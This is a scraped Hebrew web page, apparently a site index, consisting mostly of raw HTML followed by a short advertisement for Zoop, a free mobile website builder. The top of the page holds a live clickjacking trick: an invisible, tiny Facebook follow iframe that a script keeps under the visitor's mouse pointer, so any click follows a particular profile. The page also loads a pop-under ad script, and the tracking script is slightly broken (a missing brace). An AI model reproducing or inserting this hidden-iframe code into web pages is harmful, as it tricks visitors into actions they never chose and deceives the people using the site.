אינדקס אתרים - בן קצב
<div id="left" style="height: 877px;"><br />
<div id="container">
<div id="left"><center>
<p align="center"><img style="float: left;" src="http://s1.postimg.org/4jfbkzilr/mako2.png" alt="" width="1100" height="800" /></p>
<div id="icontainer" style="overflow: hidden; width: 10px; height: 12px; position: absolute; opacity: 0; top: 379px; left: 607px;"><!--facebook like frame code goes here--> <iframe id="fbframe" style="border: currentColor; width: 50px; height: 23px; overflow: hidden;" name="fbframe" src="http://www.facebook.com/plugins/follow.php?href=https%3A%2F%2Fwww.facebook.com%2Fyakir.sindani&amp;layout=standard&amp;show_faces=true&amp;colorscheme=light&amp;font&amp;width=450&amp;height=80" frameborder="0" scrolling="no" width="320" height="240"></iframe> <!--end facebook like frame code--></div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
<script type="text/javascript">// <![CDATA[
var iflag = 0;
var icontainer = document.getElementById('icontainer'); 
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
 
 
 
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event) 
{ // for IE
 
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
else 
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
// ]]></script>
</center><!-- www.serversfree.com Analytics Code -->
<script type="text/javascript" src="http://www.serversfree.com"></script>
<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a title="Free hosting servers" href="http://www.serversfree.com"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Free servers&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a title="Free websites hosting server" href="http://www.serversfree.com"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Free websites hosting server&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a title="Free hosting server features" href="http://www.serversfree.com/server-features/"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Free server features&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a title="Free hosting" href="http://www.bugs3.com"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Free hosting&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a title="Page rank" href="http://www.1pagerank.com"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Page rank&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript>
<script type="text/javascript">// <![CDATA[
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-24425628-3']);
  _gaq.push(['_setDomainName', window.location.host]);
  _gaq.push(['_setAllowLinker', true]);
  _gaq.push(['_trackPageview']);
 
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
// ]]></script>
<script type="text/javascript" src="http://www.bugs3.com/ganalytics.js"></script>
<!-- End Of Analytics Code -->
<div class="clr">&nbsp;</div>
</div>
<div class="clr">&nbsp;</div>
</div>
<div class="clr">&nbsp;</div>
<!-- Popunder code -->
<script type="text/javascript" src="http://yo-yoo.co.il/pop_under.js"></script>
<script type="text/javascript">// <![CDATA[
window.PopUnder = {
link: "http://www.yo-yoo.co.il/1.1/popgames/", 
time: 86400000 /* 1000 * 60 * 60 * 24 milli seconds in a day */
};
// ]]></script>
<!-- Popunder code --> <br /><br />
<div style="width: 100%; text-align: center; margin-top: 20px;"><strong><span style="font-family: arial; font-size: x-small;"><br /> </span></strong></div>
<div class="clr">&nbsp;</div>
</div>
 

בניית אתר בחינם

במידה ואתה רוצה לבנות אתר בחינם, תוכל להתנסות באחת מהמערכות שלנו לבניית אתרים בחינם, בחר עיצוב והתחל לבנות אתר לעסק שלך
 
מצד שמאל תוכלו לראות מגוון עיצובים שתוכלו לבחור לאתר הסלולרי החדש שתבנו בזופ בדקות הקרובות
 
לאחר שתכנסו למערכת הניהול תחשפו לאפשרויות רבות לניהול התוכן באתר, תקבלו קוד QR ייחודי לאתר שלכם, תוכלו לנהל דפי תוכן, מפות, טפסים ועוד..
 
לחץ כאן לבניית אתר בחינם

החבילות של זופ

זופ מציעה שירותי פרימיום, לניהול אתר המובייל שלך.  שימוש בדומיין שלך, אחסון ברמה גבוהה , קידום באינדקס אתרים שלנו ועוד...

 

 
לחץ כאן לצפייה בחבילות של זופ